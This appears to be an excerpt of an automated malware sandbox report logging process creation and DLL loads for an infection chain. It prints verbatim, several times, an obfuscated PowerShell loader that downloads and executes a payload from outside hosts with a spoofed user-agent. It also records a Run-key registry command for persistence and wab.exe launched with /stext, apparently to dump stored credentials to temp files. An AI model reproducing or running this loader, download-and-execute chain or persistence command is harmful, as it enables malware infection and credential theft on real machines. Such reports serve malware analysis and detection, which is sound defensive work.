($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
